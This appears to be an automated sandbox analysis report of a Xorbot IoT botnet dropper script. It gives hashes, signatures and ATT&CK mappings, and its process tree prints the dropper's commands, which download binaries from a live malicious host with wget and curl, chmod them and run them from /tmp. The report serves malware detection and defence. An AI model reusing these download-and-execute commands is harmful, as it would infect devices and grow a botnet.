xorbot | 7342b014356a9d5553caf8076aa25c9e94846f563260b0e4777bcce77ca62eaf

Analysis

max time kernel
149s
max time network
19s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
10/12/2024, 16:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

04b0aa80fd5dbe2a2c5aba032f1080a4
SHA1

b323e443493c9833347bac801450e2835febde15
SHA256

7342b014356a9d5553caf8076aa25c9e94846f563260b0e4777bcce77ca62eaf
SHA512

f8058a40bf2ae4e4d453e20f3214bd5205bf15a984a53ae21b6690a0e3c8fba6bf1bf76ad4560a7208ea3dcd7715b7551fbea624de4dfe4597ece8f6bd8f7376
SSDEEP

192:7bxZiPr/Hfi1ZKbrotcQoRmENsirjE597xZiPr7R1ZKbr2QoRmENLrjE59f:7bxZiPrffi1ZKbrotjirjE597xZiPrdY

Score

10^/10

xorbot antivm botnet defense_evasion discovery trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
696	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/fLF7HjjWOCuozHVM57o3qbDkQVkEiTUkNA	698	fLF7HjjWOCuozHVM57o3qbDkQVkEiTUkNA

Checks CPU configuration 1 TTPs 2 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 4 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 5 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
667	wget
676	curl
695	busybox
701	wget
703	curl

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/fLF7HjjWOCuozHVM57o3qbDkQVkEiTUkNA	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:663
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:665
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/fLF7HjjWOCuozHVM57o3qbDkQVkEiTUkNA
  2⤵
  - System Network Configuration Discovery
  PID:667
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/fLF7HjjWOCuozHVM57o3qbDkQVkEiTUkNA
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:676
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/fLF7HjjWOCuozHVM57o3qbDkQVkEiTUkNA
  2⤵
  - System Network Configuration Discovery
  PID:695
- /bin/chmod
  chmod 777 fLF7HjjWOCuozHVM57o3qbDkQVkEiTUkNA
  2⤵
  - File and Directory Permissions Modification
  PID:696
- /tmp/fLF7HjjWOCuozHVM57o3qbDkQVkEiTUkNA
  ./fLF7HjjWOCuozHVM57o3qbDkQVkEiTUkNA
  2⤵
  - Executes dropped EXE
  PID:698
- /bin/rm
  rm fLF7HjjWOCuozHVM57o3qbDkQVkEiTUkNA
  2⤵
  PID:700
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Ecizoew5iU71xfKVuTPquy3RDwLDrOIvTV
  2⤵
  - System Network Configuration Discovery
  PID:701
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Ecizoew5iU71xfKVuTPquy3RDwLDrOIvTV
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:703

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/fLF7HjjWOCuozHVM57o3qbDkQVkEiTUkNA

Filesize
122KB

MD5
cd3d4b9c643e5b473fb4d88ed05f0716

SHA1
64ee7a97418583d759eaea8000890cc3bae1b5f4

SHA256
0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944

SHA512
164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads